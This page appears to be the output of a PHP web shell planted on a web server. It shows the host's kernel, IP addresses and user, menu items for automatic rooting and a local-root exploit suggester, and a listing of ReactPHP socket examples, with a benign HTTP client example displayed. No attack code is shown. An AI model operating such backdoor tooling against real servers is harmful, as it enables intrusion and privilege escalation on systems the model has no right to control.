Linux unitednationsplay.com 3.10.0-1160.45.1.el7.x86_64 #1 SMP Wed Oct 13 17:20:51 UTC 2021 x86_64
nginx/1.20.1
Server IP : 188.130.139.92 & Your IP : 3.135.201.190
Domains :
Cant Read [ /etc/named.conf ]
User : web
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
home /
www /
unp-test /
vendor /
react /
socket /
examples /
Delete
Unzip
Name
Size
Permission
Date
Action
01-echo-server.php
1.12
KB
-rw-r--r--
2018-10-01 12:20
02-chat-server.php
1.78
KB
-rw-r--r--
2018-10-01 12:20
03-http-server.php
2.04
KB
-rw-r--r--
2018-10-01 12:20
11-http-client.php
1.08
KB
-rw-r--r--
2018-10-01 12:20
12-https-client.php
1.09
KB
-rw-r--r--
2018-10-01 12:20
21-netcat-client.php
2.04
KB
-rw-r--r--
2018-10-01 12:20
22-http-client.php
1.95
KB
-rw-r--r--
2018-10-01 12:20
91-benchmark-server.php
2
KB
-rw-r--r--
2018-10-01 12:20
99-generate-self-signed.php
1.03
KB
-rw-r--r--
2018-10-01 12:20
localhost.pem
2.9
KB
-rw-r--r--
2018-10-01 12:20
localhost_swordfish.pem
3.03
KB
-rw-r--r--
2018-10-01 12:20
Save
Rename
<?php // Simple plaintext HTTP client example (for illustration purposes only). // This shows how a plaintext TCP/IP connection is established to then send an // application level protocol message (HTTP). // Real applications should use react/http-client instead! // // This simple example only accepts an optional host parameter to send the // request to. See also example #22 for proper URI parsing. // // $ php examples/11-http-client.php // $ php examples/11-http-client.php reactphp.org use React\EventLoop\Factory; use React\Socket\Connector; use React\Socket\ConnectionInterface; $host = isset($argv[1]) ? $argv[1] : 'www.google.com'; require __DIR__ . '/../vendor/autoload.php'; $loop = Factory::create(); $connector = new Connector($loop); $connector->connect($host. ':80')->then(function (ConnectionInterface $connection) use ($host) { $connection->on('data', function ($data) { echo $data; }); $connection->on('close', function () { echo '[CLOSED]' . PHP_EOL; }); $connection->write("GET / HTTP/1.0\r\nHost: $host\r\n\r\n"); }, 'printf'); $loop->run();